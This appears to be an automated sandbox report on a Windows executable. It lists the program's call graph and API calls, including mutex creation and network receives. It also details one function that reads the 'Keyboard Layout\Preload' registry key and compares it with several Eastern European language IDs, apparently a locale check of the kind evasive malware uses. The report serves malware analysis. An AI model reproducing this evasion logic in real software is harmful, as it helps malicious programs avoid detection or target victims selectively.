d5313b 11813->11814 11814->11809 11815 d6c6ac GetSystemTimePreciseAsFileTime 11814->11815 11817 d5315f 11815->11817 11816->11809 11816->11811 11817->11803 11817->11807 11817->11816 11818 d6bd4c GetSystemTimePreciseAsFileTime 11817->11818 11818->11817 11503 d59adc 11506 d59aea shared_ptr 11503->11506 11504 d5a917 11505 d5a953 Sleep CreateMutexA 11504->11505 11507 d5a98e 11505->11507 11506->11504 11508 d59b4b shared_ptr 11506->11508 11509 d55c10 4 API calls 11508->11509 11510 d59b59 11508->11510 11511 d59b7c 11509->11511 11518 d58b30 11511->11518 11513 d59b8d 11514 d55c10 4 API calls 11513->11514 11515 d59cb1 11514->11515 11516 d58b30 4 API calls 11515->11516 11517 d59cc2 11516->11517 11519 d58b7c 11518->11519 11520 d55c10 4 API calls 11519->11520 11521 d58b97 shared_ptr std::invalid_argument::invalid_argument 11520->11521 11521->11513 10890 d51cc0 10891 d51cd1 10890->10891 10894 d6d64e 10891->10894 10897 d6d621 10894->10897 10898 d6d637 10897->10898 10899 d6d630 10897->10899 10906 d898fa 10898->10906 10903 d8988e 10899->10903 10902 d51cdb 10904 d898fa RtlAllocateHeap 10903->10904 10905 d898a0 10904->10905 10905->10902 10909 d89630 10906->10909 10908 d8992b 10908->10902 10910 d8963c ___std_exception_copy 10909->10910 10913 d8968b 10910->10913 10912 d89657 10912->10908 10914 d896a7 10913->10914 10918 d89714 __freea 10913->10918 10917 d896f4 __freea 10914->10917 10914->10918 10919 d8edf6 10914->10919 10916 d8edf6 RtlAllocateHeap 10916->10918 10917->10916 10917->10918 10918->10912 10921 d8ee03 10919->10921 10920 d8ee0f ___std_exception_copy 10920->10917 10921->10920 10923 d9500f 10921->10923 10924 d9501c 10923->10924 10926 d95024 __freea ___std_exception_copy 10923->10926 10925 d8b04b RtlAllocateHeap 10924->10925 10925->10926 10926->10920 10927 d5e0c0 recv 10928 d5e122 recv 10927->10928 10929 d5e157 recv 10928->10929 10930 d5e191 10929->10930 10931 d5e2b3 std::invalid_argument::invalid_argument 10930->10931 10936 d6c6ac 10930->10936 10946 d6c452 10936->10946 10938 d5e2ee 10939 d6c26a 10938->10939 10940 d6c274 10939->10940 10941 d6c292 ___std_exception_copy 10939->10941 10940->10941 10942 d6c283 10940->10942 10966 d865ed 10941->10966 10963 d6c297 10942->10963 10947 d6c4a8 10946->10947 10949 d6c47a std::invalid_argument::invalid_argument 10946->10949 10947->10949 10952 d6cf6b 10947->10952 10949->10938 10950 d6c4fd __Xtime_diff_to_millis2 10950->10949 10951 d6cf6b _xtime_get GetSystemTimePreciseAsFileTime 10950->10951 10951->10950 10953 d6cf7a 10952->10953 10955 d6cf87 __aulldvrm 10952->10955 10953->10955 10956 d6cf44 10953->10956 10955->10950 10959 d6cbea 10956->10959 10960 d6cc07 10959->10960 10961 d6cbfb GetSystemTimePreciseAsFileTime 10959->10961 10960->10955 10961->10960 10969 d52ae0 10963->10969 10965 d6c2ae std::_Throw_future_error 10967 d864c7 3 API calls 10966->10967 10968 d865fe 10967->10968 10972 d6bedf 10969->10972 10971 d52af4 ___std_exception_copy 10971->10965 10975 d6cc31 10972->10975 10976 d6cc3f InitOnceExecuteOnce 10975->10976 10978 d6bef2 10975->10978 10976->10978 10978->10971 10991 d520c0 10996 d6c68b 10991->10996 10994 d6d64e RtlAllocateHeap 10995 d520d6 10994->10995 10999 d6c3d5 10996->10999 10998 d520cc 10998->10994 11000 d6c3e1 10999->11000 11001 d6c3eb 10999->11001 11002 d6c3be 11000->11002 11003 d6c39e 11000->11003 11001->10998 11012 d6cd0a 11002->11012 11003->11001 11008 d6ccd5 11003->11008 11006 d6c3d0 11006->10998 11009 d6cce3 InitializeCriticalSectionEx 11008->11009 11010 d6c3b7 11008->11010 11009->11010 11010->10998 11013 d6cd1f RtlInitializeConditionVariable 11012->11013 11013->11006 11272 d5a9f4 11281 d59230 11272->11281 11274 d5aa03 shared_ptr 11275 d55c10 4 API calls 11274->11275 11280 d5aab3 shared_ptr std::invalid_argument::invalid_argument 11274->11280 11276 d5aa65 11275->11276 11277 d55c10 4 API calls 11276->11277 11278 d5aa8d 11277->11278 11279 d55c10 4 API calls 11278->11279 11279->11280 11282 d59284 shared_ptr 11281->11282 11283 d55c10 4 API calls 11282->11283 11289 d5944f shared_ptr 11282->11289 11283->11282 11284 d59543 shared_ptr std::invalid_argument::invalid_argument 11284->11274 11285 d55c10 4 API calls 11285->11289 11286 d598b5 shared_ptr std::invalid_argument::invalid_argument 11286->11274 11287 d5979f shared_ptr 11287->11286 11288 d55c10 4 API calls 11287->11288 11290 d59927 shared_ptr std::invalid_argument::invalid_argument 11288->11290 11289->11284 11289->11285 11289->11287 11290->11274 11851 d53fe0 11852 d54022 11851->11852 11853 d54035 std::invalid_argument::invalid_argument 11852->11853 11854 d540d2 11852->11854 11855 d5408c 11852->11855 11856 d53ee0 3 API calls 11854->11856 11858 d535e0 11855->11858 11856->11853 11859 d53616 11858->11859 11860 d52ce0 InitOnceExecuteOnce 11859->11860 11863 d5364e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 11859->11863 11861 d5369e 11860->11861 11862 d52c00 3 API calls 11861->11862 11861->11863 11862->11863 11863->11853 11864 d52b90 11865 d52bce 11864->11865 11866 d6b7fb TpReleaseWork 11865->11866 11867 d52bdb shared_ptr std::invalid_argument::invalid_argument 11866->11867 11868 d53f9f 11869 d53fb6 11868->11869 11870 d53fad 11868->11870 11871 d52410 4 API calls 11870->11871 11871->11869 11314 d58980 11316 d58aea 11314->11316 11317 d589d8 shared_ptr 11314->11317 11315 d55c10 4 API calls 11315->11317 11317->11315 11317->11316 10870 d55c83 10872 d55c91 shared_ptr ___std_exception_copy 10870->10872 10871 d55d17 shared_ptr std::invalid_argument::invalid_argument 10872->10871 10873 d55da7 RegOpenKeyExA 10872->10873 10874 d55dd6 RegQueryValueExA 10873->10874 10875 d55e00 RegCloseKey 10873->10875 10874->10875 10878 d55e26 shared_ptr ___std_exception_copy 10875->10878 10876 d55ea6 shared_ptr std::invalid_argument::invalid_argument 10877 d55c10 4 API calls 10879 d566b1 shared_ptr 10877->10879 10878->10876 10878->10877 10880 d55c10 4 API calls 10879->10880 10883 d56852 shared_ptr ___std_exception_copy 10879->10883 10881 d5673d shared_ptr 10880->10881 10882 d55c10 4 API calls 10881->10882 10881->10883 10882->10881 10884 d88ab6 RtlAllocateHeap 10883->10884 10885 d5690f shared_ptr std::invalid_argument::invalid_argument 10883->10885 10884->10885 11057 d53c8e 11058 d53c98 11057->11058 11060 d53ca5 shared_ptr 11058->11060 11061 d52410 11058->11061 11062 d52424 11061->11062 11065 d6b52d 11062->11065 11073 d83aed 11065->11073 11067 d6b5a5 ___std_exception_copy 11080 d6b1ad 11067->11080 11069 d6b598 11076 d6af56 11069->11076 11072 d5242a 11072->11060 11084 d84f29 11073->11084 11075 d6b555 11075->11067 11075->11069 11075->11072 11077 d6af9f ___std_exception_copy 11076->11077 11079 d6afb2 shared_ptr 11077->11079 11088 d6b39f 11077->11088 11079->11072 11081 d6b1d8 11080->11081 11083 d6b1e1 shared_ptr 11080->11083 11082 d6b39f InitOnceExecuteOnce 11081->11082 11082->11083 11083->11072 11087 d84f2e ___std_exception_copy 11084->11087 11085 d865ed 3 API calls 11086 d88c2f 11085->11086 11087->11075 11087->11085 11089 d6bedf InitOnceExecuteOnce 11088->11089 11091 d6b3e1 11089->11091 11090 d6b3e8 11090->11079 11091->11090 11092 d6bedf InitOnceExecuteOnce 11091->11092 11093 d6b461 11092->11093 11093->11079 11575 d542b0 11578 d53ac0 11575->11578 11577 d542bb shared_ptr 11579 d53af9 11578->11579 11581 d532d0 5 API calls 11579->11581 11582 d53c38 11579->11582 11583 d53b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 11579->11583 11580 d532d0 5 API calls 11584 d53c5f shared_ptr 11580->11584 11581->11582 11582->11580 11582->11584 11583->11577 11584->11577 11888 d577b0 11889 d577f1 11888->11889 11890 d55c10 4 API calls 11889->11890 11892 d57883 11890->11892 11891 d57953 shared_ptr std::invalid_argument::invalid_argument 11892->11891 11893 d55c10 4 API calls 11892->11893 11894 d579e3 11893->11894 11895 d55c10 4 API calls 11894->11895 11897 d57a15 11895->11897 11896 d57aa5 shared_ptr std::invalid_argument::invalid_argument 11897->11896 11906 d56d70 11897->11906 11899 d57b1b 11900 d55c10 4 API calls 11899->11900 11901 d57b7d 11900->11901 11902 d55c10 4 API calls 11901->11902 11903 d57ba0 11902->11903 11904 d55c10 4 API calls 11903->11904 11905 d57be3 shared_ptr std::invalid_argument::invalid_argument 11904->11905 11908 d56db0 shared_ptr ___std_exception_copy 11906->11908 11907 d56ec1 shared_ptr std::invalid_argument::invalid_argument 11907->11899 11908->11907 11909 d88ab6 RtlAllocateHeap 11908->11909 11909->11907 11910 d587b0 11911 d587b6 11910->11911 11912 d587b8 GetFileAttributesA 11910->11912 11911->11912 11913 d587c4 11912->11913 11914 d647b0 11916 d64eed 11914->11916 11915 d64f59 shared_ptr std::invalid_argument::invalid_argument 11916->11915 11955 d56950 11916->11955 11918 d65025 11919 d57d30 4 API calls 11918->11919 11920 d650ed 11919->11920 11959 d58380 11920->11959 11922 d65106 11923 d55c10 4 API calls 11922->11923 11924 d65155 11923->11924 11925 d55c10 4 API calls 11924->11925 11926 d65171 11925->11926 11965 d59a00 11926->11965 11956 d569c8 shared_ptr ___std_exception_copy 11955->11956 11957 d88ab6 RtlAllocateHeap 11956->11957 11958 d56d39 shared_ptr std::invalid_argument::invalid_argument 11956->11958 11957->11958 11958->11918 11960 d583e5 ___std_exception_copy 11959->11960 11961 d55c10 4 API calls 11960->11961 11962 d58427 11961->11962 11963 d55c10 4 API calls 11962->11963 11964 d58454 shared_ptr std::invalid_argument::invalid_argument 11963->11964 11964->11922 11966 d59a3f 11965->11966 11967 d55c10 4 API calls 11966->11967 11968 d59a47 11967->11968 11969 d58b30 4 API calls 11968->11969 11970 d59a58 11969->11970 10886 d587b2 10887 d587b6 10886->10887 10888 d587b8 GetFileAttributesA 10886->10888 10887->10888 10889 d587c4 10888->10889 11589 d59ab8 11591 d59acc 11589->11591 11592 d59b08 11591->11592 11593 d5a917 11592->11593 11594 d59b4b shared_ptr 11592->11594 11595 d5a953 Sleep CreateMutexA 11593->11595 11596 d55c10 4 API calls 11594->11596 11597 d59b59 11594->11597 11600 d5a98e 11595->11600 11598 d59b7c 11596->11598 11599 d58b30 4 API calls 11598->11599 11601 d59b8d 11599->11601 11602 d55c10 4 API calls 11601->11602 11603 d59cb1 11602->11603 11604 d58b30 4 API calls 11603->11604 11605 d59cc2 11604->11605 11971 d59ba5 11972 d59ba7 11971->11972 11973 d55c10 4 API calls 11972->11973 11974 d59cb1 11973->11974 11975 d58b30 4 API calls 11974->11975 11976 d59cc2 11975->11976 10866 d5b1a0 10867 d5b1f2 10866->10867 10868 d5b3ad CoInitialize 10867->10868 10869 d5b3fa shared_ptr std::invalid_argument::invalid_argument 10868->10869 11102 d570a0 11104 d570d2 ___std_exception_copy 11102->11104 11103 d57243 std::invalid_argument::invalid_argument 11104->11103 11106 d56ef0 11104->11106 11107 d56f22 ___std_exception_copy 11106->11107 11108 d88ab6 RtlAllocateHeap 11107->11108 11109 d56fd6 shared_ptr std::invalid_argument::invalid_argument 11107->11109 11108->11109 11109->11104 11114 d520a0 11115 d6c68b __Mtx_init_in_situ 2 API calls 11114->11115 11116 d520ac 11115->11116 11117 d6d64e RtlAllocateHeap 11116->11117 11118 d520b6 11117->11118 10751 d5a856 10752 d5a870 10751->10752 10753 d5a892 shared_ptr 10751->10753 10752->10753 10755 d5a94e 10752->10755 10757 d5a8a0 10753->10757 10767 d57d30 10753->10767 10758 d5a953 Sleep CreateMutexA 10755->10758 10756 d5a8ae 10756->10757 10759 d57d30 4 API calls 10756->10759 10761 d5a98e 10758->10761 10760 d5a8b8 10759->10760 10760->10757 10762 d57d30 4 API calls 10760->10762 10763 d5a8c2 10762->10763 10763->10757 10764 d57d30 4 API calls 10763->10764 10765 d5a8cc 10764->10765 10765->10757 10766 d57d30 4 API calls 10765->10766 10766->10757 10768 d57d96 ___std_exception_copy 10767->10768 10803 d57fb1 shared_ptr std::invalid_argument::invalid_argument 10768->10803 10804 d55c10 10768->10804 10770 d57dd2 10771 d55c10 4 API calls 10770->10771 10772 d57dff 10771->10772 10773 d57f3f 10772->10773 10774 d58019 10772->10774 10772->10803 10775 d55c10 4 API calls 10773->10775 10776 d55c10 4 API calls 10774->10776 10777 d57f67 10775->10777 10778 d5804c 10776->10778 10779 d55c10 4 API calls 10777->10779 10780 d55c10 4 API calls 10778->10780 10781 d57f86 10779->10781 10782 d5806b 10780->10782 10822 d88bbe 10781->10822 10784 d55c10 4 API calls 10782->10784 10785 d580a3 10784->10785 10786 d55c10 4 API calls 10785->10786 10787 d580f4 10786->10787 10788 d55c10 4 API calls 10787->10788 10789 d58113 10788->10789 10790 d55c10 4 API calls 10789->10790 10791 d5814b 10790->10791 10792 d55c10 4 API calls 10791->10792 10793 d5819c 10792->10793 10794 d55c10 4 API calls 10793->10794 10795 d581bb 10794->10795 10796 d55c10 4 API calls 10795->10796 10797 d581f3 10796->10797 10798 d55c10 4 API calls 10797->10798 10799 d58244 10798->10799 10800 d55c10 4 API calls 10799->10800 10801 d58263 10800->10801 10802 d55c10 4 API calls 10801->10802 10802->10803 10803->10756 10805 d55c54 10804->10805 10825 d54b30 10805->10825 10807 d55d17 shared_ptr std::invalid_argument::invalid_argument 10807->10770 10808 d55c7b shared_ptr ___std_exception_copy 10808->10807 10809 d55da7 RegOpenKeyExA 10808->10809 10810 d55dd6 RegQueryValueExA 10809->10810 10811 d55e00 RegCloseKey 10809->10811 10810->10811 10814 d55e26 shared_ptr ___std_exception_copy 10811->10814 10812 d55ea6 shared_ptr std::invalid_argument::invalid_argument 10812->10770 10813 d55c10 RtlAllocateHeap 10815 d566b1 shared_ptr 10813->10815 10814->10812 10814->10813 10816 d55c10 RtlAllocateHeap 10815->10816 10819 d56852 shared_ptr ___std_exception_copy 10815->10819 10818 d5673d shared_ptr 10816->10818 10817 d55c10 RtlAllocateHeap 10817->10818 10818->10817 10818->10819 10821 d5690f shared_ptr std::invalid_argument::invalid_argument 10819->10821 10829 d88ab6 10819->10829 10821->10770 10823 d88868 RtlAllocateHeap 10822->10823 10824 d88bdc 10823->10824 10824->10803 10826 d54ce5 10825->10826 10827 d54b92 10825->10827 10826->10808 10827->10826 10833 d86da6 10827->10833 10830 d88ad1 10829->10830 10858 d88868 10830->10858 10832 d88adb 10832->10821 10834 d86db4 10833->10834 10836 d86dc2 10833->10836 10838 d86d19 10834->10838 10836->10827 10839 d86d2c 10838->10839 10842 d86d52 10839->10842 10841 d86d3d 10841->10827 10843 d86d5f 10842->10843 10844 d86d6e 10842->10844 10843->10844 10846 d8b6a1 10843->10846 10844->10841 10847 d8b6be 10846->10847 10849 d8b6ce std::invalid_argument::invalid_argument 10847->10849 10850 d8f1bf 10847->10850 10849->10844 10851 d8f1df 10850->10851 10853 d8f232 __freea ___std_exception_copy std::invalid_argument::invalid_argument 10851->10853 10854 d8b04b 10851->10854 10853->10849 10856 d8b087 ___std_exception_copy 10854->10856 10857 d8b059 ___std_exception_copy 10854->10857 10855 d8b074 RtlAllocateHeap 10855->10856 10855->10857 10856->10853 10857->10855 10857->10856 10859 d8887a 10858->10859 10860 d86d52 RtlAllocateHeap 10859->10860 10861 d8888f ___std_exception_copy 10859->10861 10860->10859 10861->10832 11351 d5215a 11356 d6c6fc 11351->11356 11354 d6d64e RtlAllocateHeap 11355 d5216e 11354->11355 11358 d6c70c 11356->11358 11359 d52164 11356->11359 11358->11359 11360 d6cfbe 11358->11360 11359->11354 11361 d6ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 11360->11361 11362 d6cfd0 11361->11362 11362->11358 11997 d5735a 11999 d57368 shared_ptr 11997->11999 11998 d57400 shared_ptr std::invalid_argument::invalid_argument 11999->11998 12006 d5765e shared_ptr 11999->12006 12023 d6d111 11999->12023 12002 d6d64e RtlAllocateHeap 12003 d57654 12002->12003 12027 d6d0c7 12003->12027 12005 d5777f shared_ptr 12006->12005 12007 d55c10 4 API calls 12006->12007 12009 d57883 12007->12009 12008 d57953 shared_ptr std::invalid_argument::invalid_argument 12009->12008 12010 d55c10 4 API calls 12009->12010 12011 d579e3 12010->12011 12012 d55c10 4 API calls 12011->12012 12013 d57a15 12012->12013 12014 d57aa5 shared_ptr std::invalid_argument::invalid_argument 12013->12014 12015 d56d70 RtlAllocateHeap 12013->12015 12016 d57b1b 12015->12016 12017 d55c10 4 API calls 12016->12017 12018 d57b7d 12017->12018 12019 d55c10 4 API calls 12018->12019 12020 d57ba0 12019->12020 12021 d55c10 4 API calls 12020->12021 12022 d57be3 shared_ptr std::invalid_argument::invalid_argument 12021->12022 12025 d6d121 12023->12025 12024 d575ed 12024->12002 12024->12006 12025->12024 12031 d6d199 12025->12031 12028 d6d0d6 12027->12028 12029 d6d17f 12028->12029 12030 d6d17b RtlWakeAllConditionVariable 12028->12030 12029->12006 12030->12006 12032 d6d1a7 SleepConditionVariableCS 12031->12032 12034 d6d1c0 12031->12034 12032->12034 12034->12025 12035 d59f44 12036 d59f4c shared_ptr 12035->12036 12037 d5a953 Sleep CreateMutexA 12036->12037 12038 d5a01f shared_ptr 12036->12038 12039 d5a98e 12037->12039 11127 d53c47 11128 d53c51 11127->11128 11130 d53c5f shared_ptr 11128->11130 11131 d532d0 11128->11131 11132 d6c6ac GetSystemTimePreciseAsFileTime 11131->11132 11138 d53314 11132->11138 11133 d5336b 11134 d6c26a 4 API calls 11133->11134 11135 d5333c __Mtx_unlock 11134->11135 11137 d6c26a 4 API calls 11135->11137 11139 d53350 std::invalid_argument::invalid_argument 11135->11139 11140 d53377 11137->11140 11138->11133 11138->11135 11150 d6bd4c 11138->11150 11139->11130 11141 d6c6ac GetSystemTimePreciseAsFileTime 11140->11141 11142 d533af 11141->11142 11143 d6c26a 4 API calls 11142->11143 11144 d533b6 __Cnd_broadcast 11142->11144 11143->11144 11145 d6c26a 4 API calls 11144->11145 11146 d533d7 __Mtx_unlock 11144->11146 11145->11146 11147 d6c26a 4 API calls 11146->11147 11149 d533eb 11146->11149 11148 d5340e 11147->11148 11148->11130 11149->11130 11153 d6bb72 11150->11153 11152 d6bd5c 11152->11138 11154 d6bb9c 11153->11154 11155 d6cf6b _xtime_get GetSystemTimePreciseAsFileTime 11154->11155 11158 d6bba4 __Xtime_diff_to_millis2 std::invalid_argument::invalid_argument 11154->11158 11156 d6bbcf __Xtime_diff_to_millis2 11155->11156 11157 d6cf6b _xtime_get GetSystemTimePreciseAsFileTime 11156->11157 11156->11158 11157->11158 11158->11152 10862 d8b04b 10864 d8b087 ___std_exception_copy 10862->10864 10865 d8b059 ___std_exception_copy 10862->10865 10863 d8b074 RtlAllocateHeap 10863->10864 10863->10865 10865->10863 10865->10864 11638 d86a44 11639 d86a5c 11638->11639 11640 d86a52 11638->11640 11643 d868ed 11639->11643 11642 d86a83 __freea 11646 d8683b 11643->11646 11645 d86905 11645->11642 11647 d86863 11646->11647 11652 d86849 ___std_exception_copy 11646->11652 11648 d8686a 11647->11648 11650 d86889 11647->11650 11648->11652 11653 d869e6 11648->11653 11651 d869e6 RtlAllocateHeap 11650->11651 11650->11652 11651->11652 11652->11645 11654 d869f4 11653->11654 11657 d86a25 11654->11657 11658 d8b04b RtlAllocateHeap 11657->11658 11659 d86a05 11658->11659 11659->11652 11660 d54276 11661 d52410 4 API calls 11660->11661 11662 d5427f 11661->11662 11387 d52170 11388 d6c6fc InitializeCriticalSectionEx 11387->11388 11389 d5217a 11388->11389 11390 d6d64e RtlAllocateHeap 11389->11390 11391 d52184 11390->11391 11392 d5ad70 11393 d5addc shared_ptr 11392->11393 11394 d5aec0 shared_ptr std::invalid_argument::invalid_argument 11392->11394 11393->11394 11395 d88ab6 RtlAllocateHeap 11393->11395 11395->11393 11679 d56e14 11680 d56e16 shared_ptr ___std_exception_copy 11679->11680 11681 d56ec1 shared_ptr std::invalid_argument::invalid_argument 11680->11681 11682 d88ab6 RtlAllocateHeap 11680->11682 11682->11681 12077 d52b10 12078 d52b1c 12077->12078 12079 d52b1a 12077->12079 12080 d6c26a 4 API calls 12078->12080 12081 d52b22 12080->12081 11219 d51000 11220 d6d64e RtlAllocateHeap 11219->11220 11221 d5100a 11220->11221 11695 d52e00 11696 d52e28 11695->11696 11697 d6c68b __Mtx_init_in_situ 2 API calls 11696->11697 11698 d52e33 11697->11698 11230 d58437 11231 d58439 11230->11231 11232 d55c10 4 API calls 11231->11232 11233 d58454 shared_ptr std::invalid_argument::invalid_argument 11232->11233 11443 d58d30 11444 d58d80 11443->11444 11445 d55c10 4 API calls 11444->11445 11446 d58d9a shared_ptr std::invalid_argument::invalid_argument 11445->11446 10735 d86629 10738 d864c7 10735->10738 10740 d864d5 10738->10740 10739 d86520 10740->10739 10743 d8652b 10740->10743 10742 d8652a 10749 d8a302 GetPEB 10743->10749 10745 d86535 10746 d8653a GetPEB 10745->10746 10747 d8654a 10745->10747 10746->10747 10748 d86562 ExitProcess 10747->10748 10750 d8a31c 10749->10750 10750->10745 11252 d51020 11253 d51031 11252->11253 11254 d6d64e RtlAllocateHeap 11253->11254 11255 d5103b 11254->11255 11463 d54120 11464 d5416a 11463->11464 11465 d541b2 Concurrency::details::_ContextCallback::_CallInContext std::invalid_argument::invalid_argument 11464->11465 11467 d53ee0 11464->11467 11468 d53f48 11467->11468 11470 d53f1e 11467->11470 11469 d53f58 11468->11469 11473 d52c00 11468->11473 11469->11465 11470->11465 11474 d52c0e 11473->11474 11480 d6b847 11474->11480 11476 d52c42 11477 d52c49 11476->11477 11486 d52c80 11476->11486 11477->11465 11479 d52c58 std::_Throw_future_error 11481 d6b854 11480->11481 11485 d6b873 Concurrency::details::_Reschedule_chore 11480->11485 11489 d6cb77 11481->11489 11483 d6b864 11483->11485 11491 d6b81e 11483->11491 11485->11476 11497 d6b7fb 11486->11497 11488 d52cb2 shared_ptr 11488->11479 11490 d6cb92 CreateThreadpoolWork 11489->11490 11490->11483 11492 d6b827 Concurrency::details::_Reschedule_chore 11491->11492 11495 d6cdcc 11492->11495 11494 d6b841 11494->11485 11496 d6cde1 TpPostWork 11495->11496 11496->11494 11498 d6b807 11497->11498 11499 d6b817 11497->11499 11498->11499 11501 d6ca78 11498->11501 11499->11488 11502 d6ca8d TpReleaseWork 11501->11502 11502->11499
                                                                                                                APIs
                                                                                                                • RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,551B1C03,551B1C03), ref: 00D55DCC
                                                                                                                • RegQueryValueExA.KERNEL32(551B1C03,?,00000000,00000000,?,00000400,?,?,00000000,00000001,551B1C03,551B1C03), ref: 00D55DFA
                                                                                                                • RegCloseKey.KERNEL32(551B1C03,?,?,00000000,00000001,551B1C03,551B1C03), ref: 00D55E06
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload$VUUU$invalid stoi argument$stoi argument out of range
                                                                                                                • API String ID: 3677997916-1112634906
                                                                                                                • Opcode ID: 1891028f32113b3640aad51b92f6a02901ba59d240c95710bb0a6909d5b76614
                                                                                                                • Instruction ID: 1df7952f2d81375395909d6a9d80efbb010386e66ca19e660a29a75c8829696c
                                                                                                                • Opcode Fuzzy Hash: 1891028f32113b3640aad51b92f6a02901ba59d240c95710bb0a6909d5b76614
                                                                                                                • Instruction Fuzzy Hash: D7C21271A002189BDF28DF68CC85BEDB7B5EF45304F544299F809A72C1DB759A88CBB4

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
